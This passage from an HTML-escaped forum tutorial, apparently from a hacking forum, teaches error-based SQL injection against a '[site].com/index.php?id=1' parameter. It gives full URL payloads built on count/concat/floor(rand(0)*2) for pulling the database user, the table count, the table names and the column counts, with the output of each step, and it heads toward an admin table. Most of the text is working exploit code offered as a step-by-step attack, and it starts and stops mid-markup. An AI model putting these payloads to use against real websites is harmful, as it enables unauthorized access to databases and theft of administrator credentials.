#0000bb;"&gt;0x7e&lt;/span&gt;&lt;span style="color: #007700;"&gt;,&lt;/span&gt;&lt;span style="color: #0000bb;"&gt;0x27&lt;/span&gt;&lt;span style="color: #007700;"&gt;,&lt;/span&gt;&lt;span style="color: #0000bb;"&gt;cast&lt;/span&gt;&lt;span style="color: #007700;"&gt;(&lt;/span&gt;&lt;span style="color: #0000bb;"&gt;user&lt;/span&gt;&lt;span style="color: #007700;"&gt;()&amp;nbsp;as&amp;nbsp;&lt;/span&gt;&lt;span style="color: #0000bb;"&gt;char&lt;/span&gt;&lt;span style="color: #007700;"&gt;),&lt;/span&gt;&lt;span style="color: #0000bb;"&gt;0x27&lt;/span&gt;&lt;span style="color: #007700;"&gt;,&lt;/span&gt;&lt;span style="color: #0000bb;"&gt;0x7e&lt;/span&gt;&lt;span style="color: #007700;"&gt;))&amp;nbsp;&lt;/span&gt;&lt;span style="color: #0000bb;"&gt;from&amp;nbsp;information_schema&lt;/span&gt;&lt;span style="color: #007700;"&gt;.&lt;/span&gt;&lt;span style="color: #0000bb;"&gt;tables&amp;nbsp;limit&lt;br /&gt;0&lt;/span&gt;&lt;span style="color: #007700;"&gt;,&lt;/span&gt;&lt;span style="color: #0000bb;"&gt;1&lt;/span&gt;&lt;span style="color: #007700;"&gt;),&lt;/span&gt;&lt;span style="color: #0000bb;"&gt;floor&lt;/span&gt;&lt;span style="color: #007700;"&gt;(&lt;/span&gt;&lt;span style="color: #0000bb;"&gt;rand&lt;/span&gt;&lt;span style="color: #007700;"&gt;(&lt;/span&gt;&lt;span style="color: #0000bb;"&gt;0&lt;/span&gt;&lt;span style="color: #007700;"&gt;)*&lt;/span&gt;&lt;span style="color: #0000bb;"&gt;2&lt;/span&gt;&lt;span style="color: #007700;"&gt;))&lt;/span&gt;&lt;span style="color: #0000bb;"&gt;x&amp;nbsp;from&amp;nbsp;information_schema&lt;/span&gt;&lt;span style="color: #007700;"&gt;.&lt;/span&gt;&lt;span style="color: #0000bb;"&gt;tables&amp;nbsp;group&amp;nbsp;by&amp;nbsp;x&lt;/span&gt;&lt;span style="color: #007700;"&gt;)&lt;/span&gt;&lt;span style="color: #0000bb;"&gt;a&lt;/span&gt;&lt;span style="color: #007700;"&gt;)&amp;nbsp;and&amp;nbsp;&lt;/span&gt;&lt;span style="color: #0000bb;"&gt;1&lt;/span&gt;&lt;span style="color: #007700;"&gt;=&lt;/span&gt;&lt;span style="color: #0000bb;"&gt;1&amp;nbsp;&lt;/span&gt;&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;This sais:&lt;br /&gt;Select count and cast user() to gather user information from the current database.&lt;br /&gt;Whit a limit.&lt;br /&gt;&lt;br /&gt;If you understand the other exploits this one won't be that hard.&lt;br /&gt;&lt;br /&gt;&lt;span style="color: orange;"&gt;2. Exploit Output. Finding Database User.&lt;/span&gt;&lt;br /&gt;&lt;div class="codeblock" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; border-image: initial; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; border-right-color: rgb(204, 204, 204); border-right-style: solid; border-right-width: 1px; border-top-color: rgb(204, 204, 204); border-top-style: solid; border-top-width: 1px; padding-bottom: 4px; padding-left: 4px; padding-right: 4px; padding-top: 4px;"&gt;&lt;div class="title" style="border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; font-weight: bold; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px;"&gt;Code:&lt;/div&gt;&lt;div class="body" dir="ltr"&gt;&lt;code style="display: block; font-family: Monaco, Consolas, Courier, monospace; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;Duplicate entry '~'RS_user@localhost'~1' for key 1&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;br /&gt;So the user is RS_user.&lt;br /&gt;&lt;br /&gt;&lt;span style="color: orange;"&gt;2. Exploit code. Finding table count.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;div class="codeblock phpcodeblock" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; border-image: initial; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; border-right-color: rgb(204, 204, 204); border-right-style: solid; border-right-width: 1px; border-top-color: rgb(204, 204, 204); border-top-style: solid; border-top-width: 1px; padding-bottom: 4px; padding-left: 4px; padding-right: 4px; padding-top: 4px;"&gt;&lt;div class="title" style="border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; font-weight: bold; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px;"&gt;PHP Code:&lt;/div&gt;&lt;div class="body"&gt;&lt;div dir="ltr"&gt;&lt;code style="display: block; font-family: Monaco, Consolas, Courier, monospace; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="color: #0000bb;"&gt;http&lt;/span&gt;&lt;span style="color: #007700;"&gt;:&lt;/span&gt;&lt;span style="color: #ff8000;"&gt;//www.[site].com/index.php?id=1&amp;nbsp;and(select&amp;nbsp;1&amp;nbsp;from(select&amp;nbsp;count(*),concat((select&amp;nbsp;(select&amp;nbsp;(SELECT&lt;/span&gt;&lt;span style="color: #0000bb;"&gt;concat&lt;/span&gt;&lt;span style="color: #007700;"&gt;(&lt;/span&gt;&lt;span style="color: #0000bb;"&gt;0x7e&lt;/span&gt;&lt;span style="color: #007700;"&gt;,&lt;/span&gt;&lt;span style="color: #0000bb;"&gt;0x27&lt;/span&gt;&lt;span style="color: #007700;"&gt;,&lt;/span&gt;&lt;span style="color: #0000bb;"&gt;count&lt;/span&gt;&lt;span style="color: #007700;"&gt;(&lt;/span&gt;&lt;span style="color: #0000bb;"&gt;table_name&lt;/span&gt;&lt;span style="color: #007700;"&gt;),&lt;/span&gt;&lt;span style="color: #0000bb;"&gt;0x27&lt;/span&gt;&lt;span style="color: #007700;"&gt;,&lt;/span&gt;&lt;span style="color: #0000bb;"&gt;0x7e&lt;/span&gt;&lt;span style="color: #007700;"&gt;)&amp;nbsp;&lt;/span&gt;&lt;span style="color: #0000bb;"&gt;FROM&amp;nbsp;&lt;/span&gt;&lt;span style="color: #007700;"&gt;`&lt;/span&gt;&lt;span style="color: #0000bb;"&gt;information_schema&lt;/span&gt;&lt;span style="color: #007700;"&gt;`.&lt;/span&gt;&lt;span style="color: #0000bb;"&gt;tables&amp;nbsp;WHERE&lt;br /&gt;table_schema&lt;/span&gt;&lt;span style="color: #007700;"&gt;=&lt;/span&gt;&lt;span style="color: #0000bb;"&gt;0xHEX&lt;/span&gt;&lt;span style="color: #007700;"&gt;))&amp;nbsp;&lt;/span&gt;&lt;span style="color: #0000bb;"&gt;from&amp;nbsp;information_schema&lt;/span&gt;&lt;span style="color: #007700;"&gt;.&lt;/span&gt;&lt;span style="color: #0000bb;"&gt;tables&amp;nbsp;limit&amp;nbsp;0&lt;/span&gt;&lt;span style="color: #007700;"&gt;,&lt;/span&gt;&lt;span style="color: #0000bb;"&gt;1&lt;/span&gt;&lt;span style="color: #007700;"&gt;),&lt;/span&gt;&lt;span style="color: #0000bb;"&gt;floor&lt;/span&gt;&lt;span style="color: #007700;"&gt;(&lt;/span&gt;&lt;span style="color: #0000bb;"&gt;rand&lt;/span&gt;&lt;span style="color: #007700;"&gt;(&lt;/span&gt;&lt;span style="color: #0000bb;"&gt;0&lt;/span&gt;&lt;span style="color: #007700;"&gt;)*&lt;/span&gt;&lt;span style="color: #0000bb;"&gt;2&lt;/span&gt;&lt;span style="color: #007700;"&gt;))&lt;/span&gt;&lt;span style="color: #0000bb;"&gt;x&amp;nbsp;from&lt;br /&gt;information_schema&lt;/span&gt;&lt;span style="color: #007700;"&gt;.&lt;/span&gt;&lt;span style="color: #0000bb;"&gt;tables&amp;nbsp;group&amp;nbsp;by&amp;nbsp;x&lt;/span&gt;&lt;span style="color: #007700;"&gt;)&lt;/span&gt;&lt;span style="color: #0000bb;"&gt;a&lt;/span&gt;&lt;span style="color: #007700;"&gt;)&amp;nbsp;and&amp;nbsp;&lt;/span&gt;&lt;span style="color: #0000bb;"&gt;1&lt;/span&gt;&lt;span style="color: #007700;"&gt;=&lt;/span&gt;&lt;span style="color: #0000bb;"&gt;1&amp;nbsp;&lt;/span&gt;&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;Now take a close look at this code.&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;We need to change the database name we extracted before into hex.&lt;/span&gt;&lt;br /&gt;Where the code sais 0xHEX&lt;br /&gt;we have to do 0x and the hex obvious.&lt;br /&gt;My database name was RealSteel_1&lt;br /&gt;encoded in hex: 5265616c537465656c5f31&lt;br /&gt;We can encode this using&amp;nbsp;&lt;a href="http://www.swingnote.com/tools/texttohex.php" style="-webkit-background-clip: padding-box; color: #308cff; outline-color: initial; outline-style: none; outline-width: initial; text-decoration: none;" target="_blank"&gt;swingnote hex&lt;/a&gt;&amp;nbsp;or if you have the hackbar.&lt;br /&gt;Use that.&lt;br /&gt;&lt;br /&gt;ExploitCode to execute:&lt;br /&gt;&lt;div class="codeblock phpcodeblock" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; border-image: initial; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; border-right-color: rgb(204, 204, 204); border-right-style: solid; border-right-width: 1px; border-top-color: rgb(204, 204, 204); border-top-style: solid; border-top-width: 1px; padding-bottom: 4px; padding-left: 4px; padding-right: 4px; padding-top: 4px;"&gt;&lt;div class="title" style="border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; font-weight: bold; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px;"&gt;PHP Code:&lt;/div&gt;&lt;div class="body"&gt;&lt;div dir="ltr"&gt;&lt;code style="display: block; font-family: Monaco, Consolas, Courier, monospace; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="color: #0000bb;"&gt;http&lt;/span&gt;&lt;span style="color: #007700;"&gt;:&lt;/span&gt;&lt;span style="color: #ff8000;"&gt;//www.[site].com/index.php?id=1&amp;nbsp;and(select&amp;nbsp;1&amp;nbsp;from(select&amp;nbsp;count(*),concat((select&amp;nbsp;(select&amp;nbsp;(SELECT&lt;/span&gt;&lt;span style="color: #0000bb;"&gt;concat&lt;/span&gt;&lt;span style="color: #007700;"&gt;(&lt;/span&gt;&lt;span style="color: #0000bb;"&gt;0x7e&lt;/span&gt;&lt;span style="color: #007700;"&gt;,&lt;/span&gt;&lt;span style="color: #0000bb;"&gt;0x27&lt;/span&gt;&lt;span style="color: #007700;"&gt;,&lt;/span&gt;&lt;span style="color: #0000bb;"&gt;count&lt;/span&gt;&lt;span style="color: #007700;"&gt;(&lt;/span&gt;&lt;span style="color: #0000bb;"&gt;table_name&lt;/span&gt;&lt;span style="color: #007700;"&gt;),&lt;/span&gt;&lt;span style="color: #0000bb;"&gt;0x27&lt;/span&gt;&lt;span style="color: #007700;"&gt;,&lt;/span&gt;&lt;span style="color: #0000bb;"&gt;0x7e&lt;/span&gt;&lt;span style="color: #007700;"&gt;)&amp;nbsp;&lt;/span&gt;&lt;span style="color: #0000bb;"&gt;FROM&amp;nbsp;&lt;/span&gt;&lt;span style="color: #007700;"&gt;`&lt;/span&gt;&lt;span style="color: #0000bb;"&gt;information_schema&lt;/span&gt;&lt;span style="color: #007700;"&gt;`.&lt;/span&gt;&lt;span style="color: #0000bb;"&gt;tables&amp;nbsp;WHERE&lt;br /&gt;table_schema&lt;/span&gt;&lt;span style="color: #007700;"&gt;=&lt;/span&gt;&lt;span style="color: #0000bb;"&gt;0x5265616c537465656c5f31&lt;/span&gt;&lt;span style="color: #007700;"&gt;))&amp;nbsp;&lt;/span&gt;&lt;span style="color: #0000bb;"&gt;from&amp;nbsp;information_schema&lt;/span&gt;&lt;span style="color: #007700;"&gt;.&lt;/span&gt;&lt;span style="color: #0000bb;"&gt;tables&amp;nbsp;limit&amp;nbsp;0&lt;/span&gt;&lt;span style="color: #007700;"&gt;,&lt;/span&gt;&lt;span style="color: #0000bb;"&gt;1&lt;/span&gt;&lt;span style="color: #007700;"&gt;),&lt;/span&gt;&lt;span style="color: #0000bb;"&gt;floor&lt;/span&gt;&lt;span style="color: #007700;"&gt;(&lt;/span&gt;&lt;span style="color: #0000bb;"&gt;rand&lt;/span&gt;&lt;span style="color: #007700;"&gt;(&lt;/span&gt;&lt;span style="color: #0000bb;"&gt;0&lt;/span&gt;&lt;span style="color: #007700;"&gt;)*&lt;/span&gt;&lt;span style="color: #0000bb;"&gt;2&lt;/span&gt;&lt;span style="color: #007700;"&gt;))&lt;/span&gt;&lt;span style="color: #0000bb;"&gt;x&amp;nbsp;from&lt;br /&gt;information_schema&lt;/span&gt;&lt;span style="color: #007700;"&gt;.&lt;/span&gt;&lt;span style="color: #0000bb;"&gt;tables&amp;nbsp;group&amp;nbsp;by&amp;nbsp;x&lt;/span&gt;&lt;span style="color: #007700;"&gt;)&lt;/span&gt;&lt;span style="color: #0000bb;"&gt;a&lt;/span&gt;&lt;span style="color: #007700;"&gt;)&amp;nbsp;and&amp;nbsp;&lt;/span&gt;&lt;span style="color: #0000bb;"&gt;1&lt;/span&gt;&lt;span style="color: #007700;"&gt;=&lt;/span&gt;&lt;span style="color: #0000bb;"&gt;1&amp;nbsp;&lt;/span&gt;&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;br /&gt;&lt;span style="color: orange;"&gt;2. Exploit Output. Finding table count.&lt;/span&gt;&lt;br /&gt;&lt;div class="codeblock" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; border-image: initial; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; border-right-color: rgb(204, 204, 204); border-right-style: solid; border-right-width: 1px; border-top-color: rgb(204, 204, 204); border-top-style: solid; border-top-width: 1px; padding-bottom: 4px; padding-left: 4px; padding-right: 4px; padding-top: 4px;"&gt;&lt;div class="title" style="border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; font-weight: bold; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px;"&gt;Code:&lt;/div&gt;&lt;div class="body" dir="ltr"&gt;&lt;code style="display: block; font-family: Monaco, Consolas, Courier, monospace; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;Duplicate entry '~'number_of_table(e.g 10)~1' for key 1&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;The error sais i have 3 tables. in most cases there is alot more!&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: orange;"&gt;2. Exploit code. Finding table names.&lt;/span&gt;&lt;br /&gt;This is going to happon one by one as before whit the database names.&lt;br /&gt;We will have to use the limit again.&lt;br /&gt;&lt;br /&gt;&lt;div class="codeblock phpcodeblock" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; border-image: initial; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; border-right-color: rgb(204, 204, 204); border-right-style: solid; border-right-width: 1px; border-top-color: rgb(204, 204, 204); border-top-style: solid; border-top-width: 1px; padding-bottom: 4px; padding-left: 4px; padding-right: 4px; padding-top: 4px;"&gt;&lt;div class="title" style="border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; font-weight: bold; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px;"&gt;PHP Code:&lt;/div&gt;&lt;div class="body"&gt;&lt;div dir="ltr"&gt;&lt;code style="display: block; font-family: Monaco, Consolas, Courier, monospace; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="color: #0000bb;"&gt;http&lt;/span&gt;&lt;span style="color: #007700;"&gt;:&lt;/span&gt;&lt;span style="color: #ff8000;"&gt;//www.[site].com/index.php?id=1&amp;nbsp;and(select&amp;nbsp;1&amp;nbsp;from(select&amp;nbsp;count(*),concat((select&amp;nbsp;(select&amp;nbsp;(SELECT&amp;nbsp;distinct&lt;/span&gt;&lt;span style="color: #0000bb;"&gt;concat&lt;/span&gt;&lt;span style="color: #007700;"&gt;(&lt;/span&gt;&lt;span style="color: #0000bb;"&gt;0x7e&lt;/span&gt;&lt;span style="color: #007700;"&gt;,&lt;/span&gt;&lt;span style="color: #0000bb;"&gt;0x27&lt;/span&gt;&lt;span style="color: #007700;"&gt;,&lt;/span&gt;&lt;span style="color: #0000bb;"&gt;cast&lt;/span&gt;&lt;span style="color: #007700;"&gt;(&lt;/span&gt;&lt;span style="color: #0000bb;"&gt;table_name&amp;nbsp;&lt;/span&gt;&lt;span style="color: #007700;"&gt;as&amp;nbsp;&lt;/span&gt;&lt;span style="color: #0000bb;"&gt;char&lt;/span&gt;&lt;span style="color: #007700;"&gt;),&lt;/span&gt;&lt;span style="color: #0000bb;"&gt;0x27&lt;/span&gt;&lt;span style="color: #007700;"&gt;,&lt;/span&gt;&lt;span style="color: #0000bb;"&gt;0x7e&lt;/span&gt;&lt;span style="color: #007700;"&gt;)&amp;nbsp;&lt;/span&gt;&lt;span style="color: #0000bb;"&gt;FROM&amp;nbsp;information_schema&lt;/span&gt;&lt;span style="color: #007700;"&gt;.&lt;/span&gt;&lt;span style="color: #0000bb;"&gt;tables&amp;nbsp;Where&lt;br /&gt;table_schema&lt;/span&gt;&lt;span style="color: #007700;"&gt;=&lt;/span&gt;&lt;span style="color: #0000bb;"&gt;0xHEX&amp;nbsp;LIMIT&amp;nbsp;0&lt;/span&gt;&lt;span style="color: #007700;"&gt;,&lt;/span&gt;&lt;span style="color: #0000bb;"&gt;1&lt;/span&gt;&lt;span style="color: #007700;"&gt;))&amp;nbsp;&lt;/span&gt;&lt;span style="color: #0000bb;"&gt;from&amp;nbsp;information_schema&lt;/span&gt;&lt;span style="color: #007700;"&gt;.&lt;/span&gt;&lt;span style="color: #0000bb;"&gt;tables&amp;nbsp;limit&amp;nbsp;0&lt;/span&gt;&lt;span style="color: #007700;"&gt;,&lt;/span&gt;&lt;span style="color: #0000bb;"&gt;1&lt;/span&gt;&lt;span style="color: #007700;"&gt;),&lt;/span&gt;&lt;span style="color: #0000bb;"&gt;floor&lt;/span&gt;&lt;span style="color: #007700;"&gt;(&lt;/span&gt;&lt;span style="color: #0000bb;"&gt;rand&lt;/span&gt;&lt;span style="color: #007700;"&gt;(&lt;/span&gt;&lt;span style="color: #0000bb;"&gt;0&lt;/span&gt;&lt;span style="color: #007700;"&gt;)*&lt;/span&gt;&lt;span style="color: #0000bb;"&gt;2&lt;/span&gt;&lt;span style="color: #007700;"&gt;))&lt;/span&gt;&lt;span style="color: #0000bb;"&gt;x&amp;nbsp;from&lt;br /&gt;information_schema&lt;/span&gt;&lt;span style="color: #007700;"&gt;.&lt;/span&gt;&lt;span style="color: #0000bb;"&gt;tables&amp;nbsp;group&amp;nbsp;by&amp;nbsp;x&lt;/span&gt;&lt;span style="color: #007700;"&gt;)&lt;/span&gt;&lt;span style="color: #0000bb;"&gt;a&lt;/span&gt;&lt;span style="color: #007700;"&gt;)&amp;nbsp;and&amp;nbsp;&lt;/span&gt;&lt;span style="color: #0000bb;"&gt;1&lt;/span&gt;&lt;span style="color: #007700;"&gt;=&lt;/span&gt;&lt;span style="color: #0000bb;"&gt;1&amp;nbsp;&lt;/span&gt;&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;br /&gt;Again look at the code close.&lt;br /&gt;we need to hex the same part again:&lt;br /&gt;0XHEX thats the same as before.&lt;br /&gt;again the database name mine was 5265616c537465656c5f31&lt;br /&gt;&lt;br /&gt;This time we also need to use the lemits.&lt;br /&gt;To get the table names.&lt;br /&gt;&lt;br /&gt;Watch at the part behind 0xhex in the code it sais limit 0,1.&lt;br /&gt;it is that one we neet to increase.&lt;br /&gt;same as before 0,1 first 1,1 second and 2,1 third.&lt;br /&gt;I only have 3. if you have more keep increasing untill you have all.&lt;br /&gt;&lt;br /&gt;&lt;span style="color: orange;"&gt;2. Exploit Output. Finding table names.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;1:&lt;br /&gt;&lt;div class="codeblock" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; border-image: initial; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; border-right-color: rgb(204, 204, 204); border-right-style: solid; border-right-width: 1px; border-top-color: rgb(204, 204, 204); border-top-style: solid; border-top-width: 1px; padding-bottom: 4px; padding-left: 4px; padding-right: 4px; padding-top: 4px;"&gt;&lt;div class="title" style="border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; font-weight: bold; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px;"&gt;Code:&lt;/div&gt;&lt;div class="body" dir="ltr"&gt;&lt;code style="display: block; font-family: Monaco, Consolas, Courier, monospace; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;Duplicate entry '~'Tbl_shop'~1' for key 1&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;2:&lt;br /&gt;&lt;div class="codeblock" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; border-image: initial; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; border-right-color: rgb(204, 204, 204); border-right-style: solid; border-right-width: 1px; border-top-color: rgb(204, 204, 204); border-top-style: solid; border-top-width: 1px; padding-bottom: 4px; padding-left: 4px; padding-right: 4px; padding-top: 4px;"&gt;&lt;div class="title" style="border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; font-weight: bold; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px;"&gt;Code:&lt;/div&gt;&lt;div class="body" dir="ltr"&gt;&lt;code style="display: block; font-family: Monaco, Consolas, Courier, monospace; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;Duplicate entry '~'Tbl_admin'~1' for key 1&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;3:&lt;br /&gt;&lt;div class="codeblock" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; border-image: initial; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; border-right-color: rgb(204, 204, 204); border-right-style: solid; border-right-width: 1px; border-top-color: rgb(204, 204, 204); border-top-style: solid; border-top-width: 1px; padding-bottom: 4px; padding-left: 4px; padding-right: 4px; padding-top: 4px;"&gt;&lt;div class="title" style="border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; font-weight: bold; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px;"&gt;Code:&lt;/div&gt;&lt;div class="body" dir="ltr"&gt;&lt;code style="display: block; font-family: Monaco, Consolas, Courier, monospace; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;Duplicate entry '~'Tbl_news'~1' for key 1&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;br /&gt;So i have my 3 table names.&lt;br /&gt;&lt;br /&gt;tbl_shop, tbl_admin, tbl_news.&lt;br /&gt;The admin is interesting lets look inside!&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: orange;"&gt;2. Exploit code. Finding column count.&lt;/span&gt;&lt;br /&gt;Well this is not so different from finding table count.&lt;br /&gt;Only some parts change in the exploit code so here it is:&lt;br /&gt;&lt;br /&gt;&lt;div class="codeblock phpcodeblock" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; border-image: initial; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; border-right-color: rgb(204, 204, 204); border-right-style: solid; border-right-width: 1px; border-top-color: rgb(204, 204, 204); border-top-style: solid; border-top-width: 1px; padding-bottom: 4px; padding-left: 4px; padding-right: 4px; padding-top: 4px;"&gt;&lt;div class="title" style="border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; font-weight: bold; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px;"&gt;PHP Code:&lt;/div&gt;&lt;div class="body"&gt;&lt;div dir="ltr"&gt;&lt;code style="display: block; font-family: Monaco, Consolas, Courier, monospace; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="color: #0000bb;"&gt;http&lt;/span&gt;&lt;span style="color: #007700;"&gt;:&lt;/span&gt;&lt;span style="color: #ff8000;"&gt;//www.[site].com/index.php?id=1&amp;nbsp;and(select&amp;nbsp;1&amp;nbsp;from(select&amp;nbsp;count(*),concat((select&amp;nbsp;(select&amp;nbsp;(SELECT&lt;/span&gt;&lt;span style="color: #0000bb;"&gt;concat&lt;/span&gt;&lt;span style="color: #007700;"&gt;(&lt;/span&gt;&lt;span style="color: #0000bb;"&gt;0x7e&lt;/span&gt;&lt;span style="color: #007700;"&gt;,&lt;/span&gt;&lt;span style="color: #0000bb;"&gt;0x27&lt;/span&gt;&lt;span style="color: #007700;"&gt;,&lt;/span&gt;&lt;span style="color: #0000bb;"&gt;count&lt;/span&gt;&lt;span style="color: #007700;"&gt;(&lt;/span&gt;&lt;span style="color: #0000bb;"&gt;column_name&lt;/span&gt;&lt;span style="color: #007700;"&gt;),&lt;/span&gt;&lt;span style="color: #0000bb;"&gt;0x27&lt;/span&gt;&lt;span style="color: #007700;"&gt;,&lt;/span&gt;&lt;span style="color: #0000bb;"&gt;0x7e&lt;/span&gt;&lt;span style="color: #007700;"&gt;)&amp;nbsp;&lt;/span&gt;&lt;span style="color: #0000bb;"&gt;FROM&amp;nbsp;&lt;/span&gt;&lt;span style="color: #007700;"&gt;`&lt;/span&gt;&lt;span style="color: #0000bb;"&gt;information_schema&lt;/span&gt;&lt;span style="color: #007700;"&gt;`.&lt;/span&gt;&lt;span style="color: #0000bb;"&gt;columns&amp;nbsp;WHERE&lt;br /&gt;table_schema&lt;/span&gt;&lt;span style="color: #007700;"&gt;=&lt;/span&gt;&lt;span style="color: #0000bb;"&gt;0xHEXDB&amp;nbsp;&lt;/span&gt;&lt;span style="color: #007700;"&gt;AND&amp;nbsp;&lt;/span&gt;&lt;span style="color: #0000bb;"&gt;table_name&lt;/span&gt;&lt;span style="color: #0
